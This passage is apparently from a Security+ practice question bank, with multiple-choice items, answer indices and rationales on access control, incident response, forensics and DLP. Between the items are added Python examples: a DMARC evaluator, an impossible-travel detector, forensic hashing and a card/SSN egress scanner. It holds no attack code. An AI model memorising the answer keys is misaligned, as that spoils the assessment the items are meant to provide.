rationale:"ICS/SCADA networks (operational technology) have different threat models from corporate IT: real-time constraints, legacy protocols, decade-long device lifespans. The most important principle is strict segmentation between OT and IT networks (the Purdue model formalizes this), with controlled crossings via data diodes (one-way), jump hosts, and dedicated monitoring. Office AV may not run on OT devices. Direct internet exposure is catastrophic. Removing monitoring removes defense, not attack surface."
},
{
cat:"D3",
q:"An organization issues laptops and phones to all employees. They need to enforce that all devices have full-disk encryption, current OS patches, and screen-lock policies — and to remotely wipe lost devices. What technology category is this?",
options:["EDR (Endpoint Detection and Response)","MDM (Mobile Device Management) / UEM (Unified Endpoint Management)","SIEM (Security Information and Event Management)","DLP (Data Loss Prevention)"],
correct:1,
rationale:"MDM/UEM platforms (Jamf, Intune, Workspace ONE) push policy configuration, monitor compliance, and provide remote wipe for corporate-managed devices. EDR detects and responds to active threats on endpoints. SIEM centralizes logs for analysis. DLP prevents sensitive data from leaving the organization. The scenario describes device-policy enforcement, which is the MDM/UEM use case."
},
{
cat:"D3",
q:"PERFORMANCE-BASED: An organization is deploying a new public-facing 3-tier web application. The tiers are (1) presentation/web, (2) application/API, (3) database. Which network architecture BEST follows defense in depth?",
options:["All three tiers on a single flat network reachable from the internet","Web tier in a DMZ; app tier in a private subnet reachable only from web tier; database tier in a private subnet reachable only from app tier; firewall rules enforce the chain","Web tier private; app tier in DMZ; database tier on the internet","All tiers on the internet for ease of debugging"],
correct:1,
rationale:"The defensible 3-tier pattern places the web tier in a DMZ (reachable from internet on 443 only), the app tier in a private subnet reachable ONLY from the web tier (not directly internet-reachable), and the database in a deeper private subnet reachable ONLY from the app tier. Firewall rules between subnets enforce the chain. Each tier compromise still requires defeating the next tier's controls. (A), (C), (D) all break the isolation that makes the pattern defensible."
},
{
cat:"D3",
q:"PERFORMANCE-BASED: Match each cloud service model to who is responsible for OS patching. Models: (1) IaaS, (2) PaaS, (3) SaaS. Responsible parties: (A) Cloud provider, (B) Customer.",
options:["1-A, 2-A, 3-A","1-B, 2-A, 3-A","1-A, 2-B, 3-B","1-B, 2-B, 3-B"],
correct:1,
rationale:"In IaaS the customer rents VMs and is responsible for the OS — patching is customer responsibility. In PaaS the provider manages the OS and runtime; the customer just deploys code. In SaaS the provider manages everything including OS. Therefore: IaaS = customer patches, PaaS = provider patches, SaaS = provider patches. The cloud shared-responsibility model formalizes this split per service model — knowing it cold is required for the exam."
},
{
cat:"D4",
q:"A vulnerability scanner reports a critical CVE on a production web server that the vendor has patched. What is the FIRST step in remediating this vulnerability?",
options:["Apply the patch immediately to production","Test the patch in a non-production environment","Disable the affected service permanently","Schedule the patch for the next quarterly maintenance window"],
correct:1,
rationale:"The first step is to test the patch in a non-production environment close enough to production to catch breakage in dependent applications. For a critical CVE on an internet-facing server that testing is compressed to hours, not weeks, and a compensating control (a WAF rule or virtual patch, or restricting access to the vulnerable component) is applied while it runs. Applying directly to production risks an outage. Disabling the service may serve as a temporary compensating control but is not the FIRST step. Waiting for a quarterly window is unacceptable for a critical, exploitable flaw on a production-facing server."
},
{
cat:"D4",
q:"A SIEM correlates the following events for a single user account within 10 minutes: a failed login from Atlanta, a successful login from Atlanta, a successful login from Mumbai. Which of the following BEST describes this pattern?",
options:["Brute force attack","Impossible travel","Privilege escalation","Watering hole attack"],
correct:1,
rationale:"Impossible travel detects logins from geographically distant locations within a time window that physical travel cannot account for (Atlanta to Mumbai in 10 minutes). It strongly suggests credential compromise. Brute force would show many failed attempts. Privilege escalation is gaining higher access rights, not a geographic indicator. Watering hole is attacker compromise of a website frequented by the target."
},
{
cat:"D4",
q:"During the LESSONS LEARNED phase of an incident response, which of the following is the MOST important output?",
options:["A list of compromised systems","Updated playbooks and detection rules based on what was missed","A criminal-prosecution-ready evidence chain","A press release for media communications"],
correct:1,
rationale:"Lessons learned produces actionable improvements — updated detection rules, runbook changes, control-gap fixes — so the same or similar incident is caught faster next time. The list of compromised systems comes from identification/analysis. The criminal-evidence chain is built during containment and eradication if law enforcement is involved. A press release is part of communications during the incident."
},
{
cat:"D4",
q:"A workstation is suspected of being compromised. A forensic responder needs to collect evidence. According to the order of volatility, which type of data should be collected FIRST?",
options:["Hard drive contents","Running memory (RAM)","Network share files","Archived backup tapes"],
correct:1,
rationale:"Order of volatility dictates that more volatile data — data lost soonest if not captured — must be collected first. RAM disappears when power is cut, so it is collected before any non-volatile media. Hard drive contents persist after power-off and are next. Network share files and backup tapes are persistent and lowest priority in volatility ordering."
},
{
cat:"D4",
q:"An organization requires users to enter a password AND a code from a hardware token. Which of the following BEST describes this authentication?",
options:["Single-factor authentication using two passwords","Two-factor authentication using something you know and something you have","Two-factor authentication using something you know and somewhere you are","Three-factor authentication"],
correct:1,
rationale:"Password = something you know. Hardware token = something you have. Two distinct factor TYPES = two-factor authentication. (A) is wrong because a password and a token code are not both passwords. (C) is wrong because location is not part of the scenario. (D) is wrong — only two factor types are in play."
},
{
cat:"D4",
q:"A company's web server is running an unpatched version of Apache with a known remote-code-execution vulnerability. What does the unpatched Apache represent?",
options:["A threat","A vulnerability","A risk","An exploit"],
correct:1,
rationale:"A vulnerability is a weakness in a system that could be exploited — unpatched software with a known flaw is exactly that. A threat is the agent that might exploit the vulnerability. A risk is the combination of likelihood and impact. An exploit is the actual code or technique used to take advantage of a vulnerability."
},
{
cat:"D4",
q:"Which access control model assigns permissions based on the user's job role (e.g., 'accountant', 'engineer', 'admin')?",
options:["Discretionary Access Control (DAC)","Mandatory Access Control (MAC)","Role-Based Access Control (RBAC)","Rule-Based Access Control"],
correct:2,
rationale:"RBAC assigns permissions to roles, then assigns users to roles — making access management scalable in enterprises. DAC lets the resource owner choose who can access (file-system permissions on most consumer OSes). MAC uses system-enforced classifications and clearances (military/government). Rule-Based Access Control uses general rules (often time-based or location-based) applied universally, independent of identity."
},
{
cat:"D4",
q:"An organization wants to grant users elevated permissions only at the moment they need them, and automatically revoke those permissions after a short time window. What is this approach called?",
options:["Just-in-time (JIT) access","Standing privilege","Role-based access","Discretionary access"],
correct:0,
rationale:"Just-in-time (JIT) access grants elevated permissions only for the duration of an approved task, eliminating standing privilege as an attack surface. PAM (Privileged Access Management) platforms implement JIT alongside session recording, credential vaulting, and break-glass access. Standing privilege is the opposite — permanent elevated rights. RBAC and DAC are access models, not granting strategies."
},
{
cat:"D4",
q:"An organization uses SAML to federate authentication between its identity provider and multiple SaaS applications. What is the PRIMARY security benefit of this architecture?",
options:["Users have a separate password for every SaaS application","User credentials are managed centrally; offboarding instantly revokes access to all federated apps","Each SaaS application stores its own copy of the password","MFA is automatically disabled"],
correct:1,
rationale:"Federated identity (SAML, OIDC) centralizes credential management at the IdP. Disabling a user in the IdP stops new logins to every federated application at once, which solves the classic offboarding problem of dozens of orphaned accounts. One caveat: sessions and tokens a SaaS application has already issued remain valid until they expire, so pair IdP disablement with short session lifetimes and, where the application supports it, SCIM deprovisioning or a session-revocation call. Centralized MFA, audit logging, and conditional access are further benefits. (A), (C), and (D) describe the opposite of what federation provides."
},
{
cat:"D4",
q:"Modern NIST password guidance (SP 800-63B) explicitly discourages which of the following long-standing practices?",
options:["Using a password manager","Forced periodic password rotation without evidence of compromise","Using passphrases of 15+ characters","Checking new passwords against breach corpus lists"],
correct:1,
rationale:"NIST SP 800-63B (revised) discourages mandatory periodic rotation because it pushes users toward weak, predictable patterns (Password1, Password2, Password3...). Rotation should be triggered by evidence of compromise. The same guidance encourages password managers, long passphrases, and checking against known-breached lists. The shift away from forced rotation is one of the most commonly tested updates on recent SY0-7xx exams."
},
{
cat:"D4",
q:"Which authentication factor type is a fingerprint scan?",
options:["Something you know","Something you have","Something you are","Somewhere you are"],
correct:2,
rationale:"Biometric factors (fingerprint, face, iris, voice) are 'something you are' — based on a physical or behavioral trait. 'Something you know' is a password or PIN. 'Something you have' is a token, smart card, or phone. 'Somewhere you are' is a location-based factor (geofencing, source IP). MFA strength comes from combining factors of DIFFERENT types, not multiples of the same type."
},
{
cat:"D4",
q:"When evaluating a biometric authentication system, which metric BEST captures the system's overall accuracy by representing the point at which the False Acceptance Rate and False Rejection Rate are equal?",
options:["False Acceptance Rate (FAR) alone","False Rejection Rate (FRR) alone","Crossover Error Rate (CER)","Failure to Enroll Rate (FER)"],
correct:2,
rationale:"The Crossover Error Rate (CER), also called Equal Error Rate (EER), is the operating point where FAR equals FRR. A lower CER means a more accurate system overall. FAR alone tells you how often imposters are wrongly accepted. FRR alone tells you how often legitimate users are wrongly rejected. Tuning a system makes one go up as the other goes down; CER is the single comparable accuracy number."
},
{
cat:"D4",
q:"A company implements separation of duties so that the person who initiates a wire transfer cannot also approve it. What threat does this primarily mitigate?",
options:["External denial of service","Insider fraud and unilateral action","SQL injection","Ransomware encryption"],
correct:1,
rationale:"Separation of duties splits a sensitive activity across multiple people so no single individual can complete it alone. It defeats insider fraud and reduces the impact of a single compromised account. It does not prevent external technical attacks (DoS, SQL injection, ransomware) — those are addressed by other controls. SoD is a procedural control, often paired with PAM for technical enforcement."
},
{
cat:"D4",
q:"Which email authentication protocol allows a domain owner to publish a policy stating how receiving servers should treat messages that fail SPF and DKIM checks?",
options:["SPF","DKIM","DMARC","BIMI"],
correct:2,
rationale:"DMARC (Domain-based Message Authentication, Reporting, and Conformance) builds on SPF and DKIM. The domain owner publishes a DMARC record stating the policy (none, quarantine, reject) for messages that fail SPF/DKIM alignment, plus reporting addresses. SPF authorizes sending IPs. DKIM signs messages cryptographically. BIMI displays a verified brand logo in supporting mail clients but does not set enforcement policy."
},
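Added example, not part of the original question set: a minimal DMARC evaluator in Python that parses a published record, applies the relaxed/strict identifier-alignment rules from RFC 7489 to SPF and DKIM results, and returns the disposition. The record text and the authentication results are constructed inline, so nothing is looked up in DNS; the organizational-domain logic is simplified to the last two labels (a production implementation consults the Public Suffix List), and pct sampling is not modelled.

```python
from dataclasses import dataclass

# Constructed sample of what a receiver would fetch from the _dmarc.example.com TXT record.
SAMPLE_RECORD = ("v=DMARC1; p=reject; sp=quarantine; adkim=s; aspf=r; "
                 "rua=mailto:dmarc-reports@example.com")


def parse_dmarc(record: str) -> dict:
    """Split a DMARC TXT record into tags, filling in RFC 7489 defaults."""
    tags = {"adkim": "r", "aspf": "r"}          # relaxed alignment is the default
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1" or "p" not in tags:
        raise ValueError("not a usable DMARC record: needs v=DMARC1 and p=")
    return tags


def org_domain(domain: str) -> str:
    """Simplified organizational domain: the last two labels (assumption, see lead-in)."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def aligned(auth_domain: str, from_domain: str, mode: str) -> bool:
    """Strict mode needs an exact match; relaxed mode matches on the org domain."""
    if mode == "s":
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)


@dataclass
class AuthResult:
    from_domain: str   # RFC5322.From domain, the one the recipient sees
    spf_pass: bool
    spf_domain: str    # RFC5321.MailFrom domain the SPF check was run against
    dkim_pass: bool
    dkim_domain: str   # d= tag of the DKIM signature that verified


def evaluate(record: str, r: AuthResult) -> tuple:
    """Return ('pass', 'none') or ('fail', <policy to apply>).

    DMARC passes if EITHER SPF or DKIM passes AND that identifier aligns with
    the From domain. A pass on an unaligned domain (the typical spoof, where
    the attacker's own domain has valid SPF) counts for nothing.
    """
    tags = parse_dmarc(record)
    spf_ok = r.spf_pass and aligned(r.spf_domain, r.from_domain, tags["aspf"])
    dkim_ok = r.dkim_pass and aligned(r.dkim_domain, r.from_domain, tags["adkim"])
    if spf_ok or dkim_ok:
        return ("pass", "none")
    policy = tags["p"]
    # sp= overrides p= for mail whose From is a subdomain of the org domain
    if org_domain(r.from_domain) != r.from_domain.lower() and "sp" in tags:
        policy = tags["sp"]
    return ("fail", policy)


# Constructed scenarios: a spoof, a legitimate relay, a strict-DKIM miss, a subdomain.
SPOOF = AuthResult("example.com", True, "attacker.net", False, "")
LEGIT = AuthResult("example.com", True, "bounce.example.com", True, "example.com")
STRICT_MISS = AuthResult("example.com", False, "", True, "mail.example.com")
SUBDOMAIN = AuthResult("news.example.com", False, "", False, "")

if __name__ == "__main__":
    for name, case in [("spoof", SPOOF), ("legit", LEGIT),
                       ("strict_miss", STRICT_MISS), ("subdomain", SUBDOMAIN)]:
        print(name, evaluate(SAMPLE_RECORD, case))
```

The STRICT_MISS case is the one that bites real deployments: a valid DKIM signature from mail.example.com fails under adkim=s, so switching to strict alignment without updating every sending system turns legitimate mail into rejects.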
{
cat:"D4",
q:"An organization wants to allow only a curated list of approved applications to run on employee laptops; all other executables are blocked. What is this approach called, and what is its primary security benefit?",
options:["Application blocklisting — flexibility","Application allowlisting (whitelisting) — defaults to deny, dramatically reducing malware execution surface","EDR — detection after execution","Anti-spyware scanning"],
correct:1,
rationale:"Application allowlisting (formerly whitelisting) approves a specific set of executables and denies everything else by default. The security benefit is huge: unknown executables (including most malware) simply cannot run, even if delivered. Application blocklisting attempts the opposite (block known-bad, allow everything else) and is less effective because new malware is constantly created. EDR is reactive. Anti-spyware is signature-based detection."
},
{
cat:"D4",
q:"A SIEM aggregates logs from firewalls, endpoints, identity providers, and applications. What primary value does this aggregation provide that the source systems do not?",
options:["Each source system already does this","Cross-source correlation — patterns that span systems (impossible travel, lateral movement, kill-chain progression) become detectable","Lower storage cost","Faster log writes"],
correct:1,
rationale:"Individual source systems see only their own events. A SIEM centralizes and correlates across sources, making it possible to detect patterns no single system can see: a login from one country followed by a Windows event log entry on a server in another, a phishing email followed by a malware execution followed by lateral movement. (A) is incorrect, (C) and (D) are usually worse with a SIEM than without."
},
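Added example, not part of the original question set: the impossible-travel rule from the earlier SIEM question, written as the kind of cross-source correlation this question describes. Events from three assumed sources (VPN, identity provider, server EDR) are already normalised to a common schema with geo-IP coordinates; the events, users, and coordinates are constructed for illustration, and the 1000 km/h threshold and 100 km minimum distance are assumed tuning values.

```python
from datetime import datetime, timedelta
from math import asin, cos, radians, sin, sqrt

MAX_SPEED_KMH = 1000.0     # about airliner speed; faster than this is physically implausible
MIN_KM = 100.0             # ignore small jumps caused by geo-IP imprecision
WINDOW = timedelta(hours=24)

# Constructed events, already normalised from three sources (VPN, IdP, server EDR).
# Geo-IP coordinates are approximate city centres.
EVENTS = [
    {"ts": "2024-05-01T10:00:00", "user": "jsmith", "source": "vpn", "result": "fail",
     "city": "Atlanta", "lat": 33.75, "lon": -84.39},
    {"ts": "2024-05-01T10:02:00", "user": "jsmith", "source": "idp", "result": "success",
     "city": "Atlanta", "lat": 33.75, "lon": -84.39},
    {"ts": "2024-05-01T10:09:00", "user": "jsmith", "source": "edr", "result": "success",
     "city": "Mumbai", "lat": 19.08, "lon": 72.88},
    {"ts": "2024-05-01T11:00:00", "user": "ajones", "source": "idp", "result": "success",
     "city": "Atlanta", "lat": 33.75, "lon": -84.39},
    {"ts": "2024-05-01T19:30:00", "user": "ajones", "source": "vpn", "result": "success",
     "city": "Chicago", "lat": 41.88, "lon": -87.63},
]


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two lat/lon points."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def impossible_travel(events, max_speed_kmh=MAX_SPEED_KMH, min_km=MIN_KM, window=WINDOW):
    """Alert when two consecutive SUCCESSFUL logins for one user imply travel faster
    than max_speed_kmh. Failed logins are skipped: they say nothing about where the
    legitimate user is, and an attacker guessing from abroad should not suppress the
    alert on the successful login that follows."""
    alerts = []
    last = {}                                   # user -> most recent successful login
    for e in sorted(events, key=lambda ev: ev["ts"]):
        if e["result"] != "success":
            continue
        prev = last.get(e["user"])
        if prev is not None:
            dt = datetime.fromisoformat(e["ts"]) - datetime.fromisoformat(prev["ts"])
            hours = dt.total_seconds() / 3600
            km = haversine_km(prev["lat"], prev["lon"], e["lat"], e["lon"])
            if dt <= window and km >= min_km:
                speed = km / hours if hours > 0 else float("inf")
                if speed > max_speed_kmh:
                    alerts.append({
                        "user": e["user"], "from": prev["city"], "to": e["city"],
                        "sources": (prev["source"], e["source"]),
                        "km": round(km), "minutes": round(hours * 60), "kmh": round(speed),
                    })
        last[e["user"]] = e
    return alerts


if __name__ == "__main__":
    for alert in impossible_travel(EVENTS):
        print(alert)
```

The point the question makes is visible in the output: the Atlanta login is an IdP event and the Mumbai login is an EDR event on a server, so neither source alone could have produced the alert. ajones, who moves Atlanta to Chicago over 8.5 hours, stays under the speed threshold and is not reported.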
{
cat:"D4",
q:"A SOAR platform receives a SIEM alert about a confirmed-malicious file hash. The SOAR automatically queries the EDR to find every host where that hash has been seen, isolates those hosts from the network, and creates a ticket for the analyst. What is the PRIMARY value of SOAR in this workflow?",
options:["Replacing the analyst entirely","Reducing mean time to respond (MTTR) by automating the deterministic parts of incident response, freeing the analyst for judgment work","Increasing the number of false positives","Eliminating the need for a SIEM"],
correct:1,
rationale:"Security Orchestration, Automation, and Response (SOAR) automates repetitive, deterministic steps in an IR playbook — query, contain, ticket — so the analyst spends their time on judgment-heavy work (root cause, scope, communication). It reduces MTTR dramatically. It does not replace analysts (judgment is still human), does not increase false positives, and works alongside (not instead of) the SIEM."
},
{
cat:"D4",
q:"An organization follows the 3-2-1 backup rule. Which of the following BEST describes it?",
options:["3 backups, 2 hours, 1 copy","3 copies of data, on 2 different media types, with 1 copy off-site","3 vendors, 2 protocols, 1 cloud","3 admins, 2 reviews, 1 approval"],
correct:1,
rationale:"The 3-2-1 backup rule: maintain 3 total copies of important data, on 2 different media types (e.g., local disk and tape, or local disk and cloud), with 1 copy stored off-site. The rule survives common failure modes — a hardware failure does not destroy multiple copies, a fire does not destroy the off-site copy, and ransomware that hits primary storage does not necessarily hit air-gapped or off-site copies."
},
{
cat:"D4",
q:"An organization's Recovery Point Objective (RPO) for its order-management database is 1 hour. What does this mean?",
options:["The system must be restored within 1 hour of an outage","The maximum acceptable data loss is 1 hour of transactions — backups must be taken at least every hour","Backups are kept for 1 hour","Users are notified within 1 hour"],
correct:1,
rationale:"RPO defines the maximum acceptable amount of data loss measured in time. A 1-hour RPO means backups (or replication) must be frequent enough that no more than 1 hour of data can be lost in any disaster. Recovery Time Objective (RTO) is the maximum acceptable downtime — that is what (A) describes. Knowing the difference between RPO and RTO is heavily tested."
},
{
cat:"D4",
q:"Which disaster-recovery site type provides the FASTEST recovery time but at the HIGHEST cost?",
options:["Cold site","Warm site","Hot site","Mobile site"],
correct:2,
rationale:"A hot site is a fully equipped, near-real-time replica of production — failover can occur in minutes. It is also the most expensive because the duplicate infrastructure is always running. A cold site is space and power only; recovery takes days. A warm site has hardware but data must be loaded; recovery takes hours. Mobile sites are portable but typically warm-class. Cost and recovery speed scale together."
},
{
cat:"D4",
q:"Which incident response phase includes activities like training staff, building playbooks, deploying monitoring, and maintaining contact lists for legal and PR?",
options:["Identification","Preparation","Containment","Recovery"],
correct:1,
rationale:"Preparation is the everything-before-the-incident phase: train people, write and test playbooks, deploy monitoring, maintain contacts for legal/PR/law enforcement, ensure communications channels work. Identification is detecting an incident in progress. Containment limits damage. Recovery restores normal operations. Most IR maturity gaps are in Preparation, not in the heat-of-incident phases."
},
{
cat:"D4",
q:"An organization runs a quarterly exercise where the IR team walks through a hypothetical breach scenario at a conference table, discussing what each role would do. What kind of exercise is this?",
options:["Live red-team engagement","Tabletop exercise","Full-scale failover test","Penetration test"],
correct:1,
rationale:"A tabletop exercise is a discussion-based walkthrough of an incident scenario with no real systems impacted. It is the cheapest way to validate playbooks, surface confusion about roles, and find missing decision points. Live red-team engagements actually attack the environment. Full-scale failover tests actually fail systems over. Pen tests look for exploitable vulnerabilities. Tabletops are the foundation; the other exercises are the building."
},
{
cat:"D4",
q:"A forensic responder must image a suspect's hard drive for analysis. What hardware should be used to prevent any accidental modification of the source drive during imaging?",
options:["A network tap","A write blocker (hardware or software)","A KVM switch","A USB hub"],
correct:1,
rationale:"A write blocker is a device (hardware or software) placed between the forensic workstation and the source drive that physically/logically prevents any write commands from reaching the source. It preserves the integrity of evidence and the chain of custody — modification of the source after seizure can render evidence inadmissible. A network tap copies network traffic. A KVM switch shares peripherals. A USB hub just multiplies ports — does NOT block writes."
},
{
cat:"D4",
q:"After imaging a suspect drive, the forensic responder generates a SHA-256 hash of the image and the source. Why is this critical to the investigation?",
options:["To compress the image","To prove in court that the image was not altered after acquisition (chain of custody)","To make the analysis faster","To encrypt the image"],
correct:1,
rationale:"The hash of the source drive is computed and recorded at acquisition time; later, the analyst (or opposing counsel) can rehash the image and verify it matches. A matching hash shows the bits are unchanged, because any alteration would produce a different SHA-256 value with overwhelming probability. The recorded hashes are what make the chain-of-custody documentation verifiable rather than merely asserted; without them, evidence can be challenged as potentially altered. Hashing does not compress or encrypt the image."
},
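Added example, not part of the original question set: hashing a source device and its acquired image in fixed-size chunks, comparing the two, and producing the custody-log entry that records the result. The disk and the image are constructed in-memory byte strings so the example runs offline; on a real acquisition the same functions are pointed at the block device (through a write blocker) and the image file. The case identifier and examiner name are placeholders.

```python
import hashlib
import io
import json
from datetime import datetime, timezone

CHUNK_SIZE = 1024 * 1024   # 1 MiB reads, so a multi-terabyte image never sits in RAM


def sha256_stream(fobj, chunk_size=CHUNK_SIZE) -> str:
    """SHA-256 of any binary stream (block device, image file, BytesIO)."""
    digest = hashlib.sha256()
    for block in iter(lambda: fobj.read(chunk_size), b""):
        digest.update(block)
    return digest.hexdigest()


def sha256_bytes(data: bytes) -> str:
    """SHA-256 of an in-memory byte string, via the same streaming code path."""
    return sha256_stream(io.BytesIO(data))


def sha256_path(path: str) -> str:
    """Convenience wrapper for a real device node or image file on disk."""
    with open(path, "rb") as f:
        return sha256_stream(f)


def verify_acquisition(source, image, case_id: str, examiner: str) -> dict:
    """Hash source and image and return the custody-log entry to be signed and filed.
    'verified' is True only when the two digests are identical."""
    source_hash = sha256_stream(source)
    image_hash = sha256_stream(image)
    return {
        "case_id": case_id,
        "examiner": examiner,
        "timestamp_utc": datetime.now(timezone.utc).isoformat(timespec="seconds"),
        "algorithm": "sha256",
        "source_hash": source_hash,
        "image_hash": image_hash,
        "verified": source_hash == image_hash,
    }


# Constructed 3 MiB stand-in for a disk: a boot-sector signature followed by filler.
SAMPLE_DISK = b"\x00" * 510 + b"\x55\xAA" + b"\xAB" * (3 * 1024 * 1024 - 512)
# Same bytes with the final byte altered: what a bad read or tampering looks like.
TAMPERED_IMAGE = SAMPLE_DISK[:-1] + b"\xAC"


def verify_sample(tampered: bool = False) -> dict:
    """Run the check against the constructed disk and a faithful or tampered image."""
    image = TAMPERED_IMAGE if tampered else SAMPLE_DISK
    return verify_acquisition(io.BytesIO(SAMPLE_DISK), io.BytesIO(image),
                              case_id="CASE-0001", examiner="J. Doe (placeholder)")


if __name__ == "__main__":
    print(json.dumps(verify_sample(), indent=2))
    print(json.dumps(verify_sample(tampered=True), indent=2))
```

A single flipped byte at the very end of 3 MiB changes every character of the digest, which is why the image hash is worth recording even when the acquisition tool reports success: the tool's own log is not evidence, the matching digest is.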
{
cat:"D4",
q:"PERFORMANCE-BASED: Place the following NIST incident response phases in correct order: (1) Containment, Eradication, Recovery; (2) Lessons Learned; (3) Detection and Analysis; (4) Preparation. What is the correct sequence?",
options:["4, 3, 1, 2","1, 2, 3, 4","3, 4, 1, 2","4, 1, 3, 2"],
correct:0,
rationale:"NIST SP 800-61 defines the IR lifecycle as: Preparation (4) — build capability before an incident; Detection and Analysis (3) — recognize and scope an incident; Containment, Eradication, and Recovery (1) — limit, remove, restore; Lessons Learned (2) — improve based on what happened. The correct order is 4-3-1-2. Many organizations skip Preparation and Lessons Learned, which is exactly why most incidents have recurring root causes."
},
{
cat:"D4",
q:"A web filtering proxy blocks access to known malicious domains and categories of inappropriate content. What category of control is this PRIMARILY?",
options:["Detective","Preventive","Corrective","Compensating"],
correct:1,
rationale:"A web filtering proxy stops users from reaching dangerous destinations BEFORE the harmful content can load — preventive. Detective controls would log and alert AFTER the fact (a SIEM detecting C2 traffic). Corrective controls clean up after an incident (restore from backup). Compensating controls substitute for an absent primary control. Many security tools are multi-class; the question asks for the PRIMARY function."
},
{
cat:"D4",
q:"An organization deploys EDR agents on every endpoint. The EDR continuously monitors process activity, file modifications, registry changes, and network connections, and uses behavioral analytics to detect suspicious patterns. How does EDR PRIMARILY differ from traditional antivirus?",
options:["EDR only scans on a schedule; AV is real-time","EDR focuses on behavioral and post-execution detection plus response actions; traditional AV focuses on signature matching","EDR is cheaper","EDR cannot quarantine files"],
correct:1,
rationale:"Traditional antivirus relies primarily on signature matching against known malware files. EDR adds continuous monitoring of behavior (process trees, lateral movement attempts, suspicious script execution), detects threats AV would miss, and provides response capabilities (isolate, kill process, roll back changes). The shift from signature-only to behavior-aware is the defining difference. Many modern EDR products still include AV signatures plus the behavioral layer."
},
{
cat:"D4",
q:"An organization wants to detect unauthorized data exfiltration by monitoring outbound network traffic for sensitive data patterns (credit card numbers, SSNs, classified document markers). What category of tool is this?",
options:["DLP (Data Loss Prevention)","IDS (Intrusion Detection System)","WAF (Web Application Firewall)","SIEM"],
correct:0,
rationale:"DLP monitors data in motion (network egress), at rest (file shares, endpoints), and in use (clipboard, USB, print). It detects and blocks transmission of sensitive data patterns. IDS detects attacks on the network. WAF protects web apps from app-layer attacks. SIEM aggregates and correlates logs. The scenario specifically describes pattern-matching outbound traffic for sensitive data — the canonical DLP use case."
},
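Added example, not part of the original question set: the pattern-matching core of a network DLP sensor, scanning outbound payloads for payment card numbers and US SSNs. The point it shows is that a bare regex floods the SOC with invoice and order numbers; validating candidates with the Luhn check and the SSA issuance rules is what makes the alert actionable. The payloads are constructed strings standing in for decoded HTTP request bodies; the Visa test number is a publicly documented test value, not a real card.

```python
import re

# 13-19 digits, optionally separated by single spaces or hyphens, not embedded in a longer run.
PAN_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")
SSN_RE = re.compile(r"(?<!\d)(\d{3})-(\d{2})-(\d{4})(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check: every real PAN passes it, most random digit runs do not."""
    total, double = 0, False
    for ch in reversed(digits):
        d = int(ch)
        if double:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
        double = not double
    return total % 10 == 0


def ssn_plausible(area: str, group: str, serial: str) -> bool:
    """SSA issuance rules: area never 000, 666 or 900-999; group never 00; serial never 0000."""
    a = int(area)
    return a not in (0, 666) and a < 900 and group != "00" and serial != "0000"


def find_sensitive(text: str) -> list:
    """Return (kind, masked_value) pairs; the masked value is safe to put in an alert."""
    hits = []
    for m in PAN_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            hits.append(("PAN", digits[:6] + "*" * (len(digits) - 10) + digits[-4:]))
    for m in SSN_RE.finditer(text):
        if ssn_plausible(*m.groups()):
            hits.append(("SSN", "***-**-" + m.group(3)))
    return hits


def classify(payload: str) -> tuple:
    """Egress decision for one reassembled payload: ('BLOCK' or 'ALLOW', hits)."""
    hits = find_sensitive(payload)
    return ("BLOCK" if hits else "ALLOW", hits)


# Constructed outbound payloads (decoded request bodies) for illustration.
SAMPLE_PAYLOADS = [
    "order=A-1234567890123&card=4111 1111 1111 1111&cvv=123",   # Visa test number, passes Luhn
    "invoice 1234567890123 total 42.00",                         # 13 digits, fails Luhn
    "applicant ssn 219-09-9999 dob 1990-01-01",                  # plausible SSN
    "ticket 000-12-3456 is not an SSN",                          # invalid area number
]

if __name__ == "__main__":
    for p in SAMPLE_PAYLOADS:
        print(classify(p), "<-", p)
```

The masking in find_sensitive matters operationally: an alert that quotes the full PAN turns the SIEM itself into cardholder-data storage and pulls it into PCI DSS scope. First six and last four is the usual compromise between analyst usefulness and exposure.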
{
cat:"D4",
q:"An organization has a strict offboarding process: when an employee leaves, IT must disable all of their accounts within 24 hours. Why is this timing critical?",
options:["To save license fees","Former employees with active credentials are a major insider-threat vector, especially in the first days after a contentious departure","Audit requirements only","To reuse their email address"],
correct:1,
rationale:"Former employees retain knowledge of systems and processes; if their access is not promptly revoked, they (or someone who acquires their credentials) can take revenge, exfiltrate data, or commit fraud — a documented pattern in many high-profile insider incidents. Tight, time-bound, federated offboarding is the mitigation. License fees and audit are secondary motivations. Reusing email addresses is operationally awkward and not the primary security driver."
},
{
cat:"D4",
q:"Which port and protocol does HTTPS use by default?",
options:["TCP 80","TCP 443","UDP 53","TCP 22"],
correct:1,
rationale:"HTTPS uses TCP port 443 (TLS-encrypted HTTP). TCP 80 is HTTP (cleartext). UDP 53 is DNS. TCP 22 is SSH. CompTIA expects rote recall of standard ports for the exam: FTP 20/21, SSH 22, Telnet 23, SMTP 25, DNS 53, HTTP 80, POP3 110, IMAP 143, HTTPS 443, SMB 445, RDP 3389. Memorize them."
},
{
cat:"D4",
q:"A vulnerability scan is performed without authentication — only what an unauthenticated attacker on the network could see. What is this called, and what is its primary limitation?",
options:["Credentialed scan — slower","Non-credentialed scan — misses vulnerabilities in services that require authentication to enumerate and patches that require local registry/file inspection","Passive scan — too noisy","Compliance scan — too narrow"],
correct:1,
rationale:"A non-credentialed (unauthenticated) scan reflects what an external attacker without credentials would see, which has external defensive value. Its limitation: many vulnerabilities are only visible when logged in (missing patches, weak local configs, vulnerable installed software). A credentialed scan gives a richer, more accurate picture. Most mature programs run both — non-credentialed for external posture, credentialed for true vulnerability inventory."
},
{
cat:"D4",
